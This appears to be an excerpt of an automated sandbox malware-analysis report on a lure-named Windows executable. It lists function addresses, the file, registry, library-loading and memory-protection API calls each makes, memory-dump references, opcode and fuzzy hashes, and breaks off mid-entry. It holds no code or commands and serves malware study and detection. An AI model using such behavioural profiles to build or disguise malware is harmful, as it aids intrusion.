                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                          • Opcode ID: f500664b12d1a9ca3d846aae4db6b5f226f7dec665eeac70e15b2afbb9a011de
                                                                                                                                                                                                                          • Instruction ID: f7ce4a596c66e03a629b41503ee4a79f45406b0749a56119d0920da1f960bb93
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f500664b12d1a9ca3d846aae4db6b5f226f7dec665eeac70e15b2afbb9a011de
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E01F431B24210ABE7194B389E04B6A37A8E710314F11823BF911F66F1D7B8DC42AB4D
                                                                                                                                                                                                                          Function 00401A03 Relevance: 3.0, APIs: 2, Instructions: 30stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A16
                                                                                                                                                                                                                          • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A29
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EnvironmentExpandStringslstrcmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1938659011-0
                                                                                                                                                                                                                          • Opcode ID: bcf3e9f808a92abb008fcd91cfb6478f52e8b1f94631290f685fc1eff8d8e701
                                                                                                                                                                                                                          • Instruction ID: bf6bb96d0a63331738c2685f3a3f780ebf23ad7b4ccd19b8e98b90d3cb04d7dd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcf3e9f808a92abb008fcd91cfb6478f52e8b1f94631290f685fc1eff8d8e701
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BAF08C72B06241EBDB20DF669C08B9B7EA8EFA1355B10803BF145F2190D2388502DB2D
                                                                                                                                                                                                                          Function 00401567 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ShowWindow.USER32(00010446), ref: 00401579
                                                                                                                                                                                                                          • ShowWindow.USER32(00010440), ref: 0040158E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ShowWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1268545403-0
                                                                                                                                                                                                                          • Opcode ID: 9dbd9b7718999257957ecf96969e76a3a03f192157de06d7b0b0cd9deed0d964
                                                                                                                                                                                                                          • Instruction ID: 7a448c7715a17160088acb1a6ba8cb9818a258c7baefa7eb8fde05be1467c36a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9dbd9b7718999257957ecf96969e76a3a03f192157de06d7b0b0cd9deed0d964
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7E04F76B10104ABDB14EBA4EE8086E77A7E794310360447BD202B3694C2B89D459A68
                                                                                                                                                                                                                          Function 00406092 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,?,00403147,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004060A4
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004060BF
                                                                                                                                                                                                                            • Part of subcall function 00406028: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040603F
                                                                                                                                                                                                                            • Part of subcall function 00406028: wsprintfA.USER32 ref: 00406078
                                                                                                                                                                                                                            • Part of subcall function 00406028: LoadLibraryA.KERNELBASE(?), ref: 00406088
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2547128583-0
                                                                                                                                                                                                                          • Opcode ID: 9d06168268301413df58d073caad4fe4514c6b8c3f7d40560c439a7b978b8ec9
                                                                                                                                                                                                                          • Instruction ID: 774eb21b39d2aab2af5da2aca531c8e6d79f2737565152ed1a094a03d1eb9b6f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d06168268301413df58d073caad4fe4514c6b8c3f7d40560c439a7b978b8ec9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28E0863254411166D610E7705D0487773AC9F84711302883EF942F2150D734AC26A669
                                                                                                                                                                                                                          Function 00405970 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe,80000000,00000003), ref: 00405974
                                                                                                                                                                                                                          • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405996
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                                                                          • Opcode ID: afccfa4f4cb9885f70129b38e82a9c897481b005b6ad677f4785abde6c99dd13
                                                                                                                                                                                                                          • Instruction ID: f6a7e9eb3deff2eb260b804c641ce7d3451857e515cdc874e2100240a7e6f5b1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afccfa4f4cb9885f70129b38e82a9c897481b005b6ad677f4785abde6c99dd13
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2D09E31658301AFEF098F20DD1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16
                                                                                                                                                                                                                          Function 0040594B Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(?,?,00405563,?,?,00000000,00405746,?,?,?,?), ref: 00405950
                                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405964
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                          • Opcode ID: 318c8869c664b65327b47b9f35d6847cb303a6655a32462d5bdd6235084e72f0
                                                                                                                                                                                                                          • Instruction ID: a0e6ef5e26ee6ddc4bb0604ab4126291559e87657aa933595c84d6ace612bc1e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 318c8869c664b65327b47b9f35d6847cb303a6655a32462d5bdd6235084e72f0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9AD0C972908120EBC2102738BE0C89BBB55DB542717058B31F969B22F0C7304C56CA95
                                                                                                                                                                                                                          Function 00405459 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateDirectoryA.KERNELBASE(?,00000000,004030CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 0040545F
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040546D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1375471231-0
                                                                                                                                                                                                                          • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                                                                                                                                                          • Instruction ID: c1acecc5f45fa991ae160619e34a4bf2a4a440633476f6552c0bcd7b2c81b644
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3C04C30B59502DAD6105B309E08B577D54AB50742F1449756546E10E0D6349451DD2F
                                                                                                                                                                                                                          Function 00402283 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004022BC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfileStringWrite
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 390214022-0
                                                                                                                                                                                                                          • Opcode ID: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
                                                                                                                                                                                                                          • Instruction ID: ed5e863b5af70a22674a87f6432e4eb84017b1e79b4e81bbc09640d5f5368664
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AE04F31B001746FDB217AF14E8EE7F11989B84348B64417EF601B62C3DDBC4D434AA9
                                                                                                                                                                                                                          Function 00402B44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(00000000,000001FC,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                                                                          • Opcode ID: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
                                                                                                                                                                                                                          • Instruction ID: 806e3b40af95552ac91145e5354a2e2caa18036cb762c00ee55acc3717e10e35
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3E04FB6240108AFDB00EFA4DD46FA537ECE714701F008021B608D6091C674E5108B69
                                                                                                                                                                                                                          Function 00405A17 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000020,?,0040305C,00000000,0040A8D8,00000020,0040A8D8,00000020,000000FF,00000004,00000000), ref: 00405A2B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                                          • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                                                                                                                                          • Instruction ID: 26d326ee603fa64f849cef49f4367d8274c9975adadc9b0c70b30f96b952ad65
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66E08C3261026AAFDF109EA18C40EEB3B6CEB04360F008432F911E2140D634EC20DFA8
                                                                                                                                                                                                                          Function 004059E8 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040308E,00000000,00000000,00402EEB,000000FF,00000004,00000000,00000000,00000000), ref: 004059FC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                                          • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                                                                                                                                                          • Instruction ID: a6feee173889208d7f2b164ec0c021529dd17bfe6846c5dde0bbd097d282ac69
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44E08632210219ABCF10AE519C44EEB375CFB00350F004833F915F3140D230E8519FA8
                                                                                                                                                                                                                          Function 1000270B Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1507773811.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507731690.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507814859.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1507849586.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                          • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                                                                                                                                                          • Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19
                                                                                                                                                                                                                          Function 004022C7 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022FA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
